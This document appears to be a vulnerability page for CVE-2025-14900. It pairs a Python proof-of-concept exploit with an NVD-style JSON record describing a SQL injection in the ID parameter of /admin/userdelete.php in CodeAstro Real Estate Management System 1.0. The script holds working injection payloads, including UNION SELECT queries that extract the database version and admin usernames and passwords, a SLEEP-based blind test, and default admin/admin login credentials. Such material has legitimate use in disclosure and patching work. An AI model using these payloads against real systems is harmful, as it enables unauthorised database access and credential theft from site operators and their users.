CVE-2025-14900

import requests import sys # CVE-2025-14900 PoC - CodeAstro Real Estate Management System SQL Injection # Target: /admin/userdelete.php # Vulnerability: SQL Injection via ID parameter target_url = "http://target-site.com/admin/userdelete.php" # Login to get admin session (required for exploitation) login_url = "http://target-site.com/admin/login.php" login_data = { "username": "admin", "password": "admin" } def exploit_sqli(target_url, session_cookie): """ SQL Injection payload examples: 1. Basic injection to confirm vulnerability 2. UNION-based injection to extract data 3. Time-based blind injection """ headers = {"Cookie": f"PHPSESSID={session_cookie}"} # Payload 1: Basic injection to confirm vulnerability payload_basic = "1' OR '1'='1" params = {"id": payload_basic} response = requests.get(target_url, params=params, headers=headers) print(f"[*] Testing basic injection: {response.status_code}") # Payload 2: UNION-based injection to extract database version payload_union = "1' UNION SELECT NULL,version(),user(),database()-- -" params = {"id": payload_union} response = requests.get(target_url, params=params, headers=headers) print(f"[*] Testing UNION injection: {response.status_code}") # Payload 3: Time-based blind injection payload_blind = "1' AND SLEEP(5)-- -" params = {"id": payload_blind} response = requests.get(target_url, params=params, headers=headers) print(f"[*] Testing blind injection: {response.status_code}") # Payload 4: Extract admin credentials payload_creds = "1' UNION SELECT NULL,username,password,NULL FROM admin_users-- -" params = {"id": payload_creds} response = requests.get(target_url, params=params, headers=headers) print(f"[*] Extracting admin credentials: {response.status_code}") return response.text if __name__ == "__main__": print("CVE-2025-14900 SQL Injection PoC") print("Target: CodeAstro Real Estate Management System 1.0") print("File: /admin/userdelete.php") # Usage instructions print("\n[!] This PoC requires authenticated admin session") print("[!] Replace 'target-site.com' with actual target")

{"cve": {"id": "CVE-2025-14900", "sourceIdentifier": "[email protected]", "published": "2025-12-19T01:16:05.850", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in CodeAstro Real Estate Management System 1.0. Affected is an unknown function of the file /admin/userdelete.php of the component Administrator Endpoint. Such manipulation of the argument ID leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:codeastro:real_estate_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "64EAEAD6-B0EE-4039-B827-3C243E2058F4"}]}]}], "references": [{"url": "https://codeastro.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/YZS17/CVE/blob/main/CodeAstro_Real_Estate_Management_System/userdelete-sqli.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337425", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337425", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.715672", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}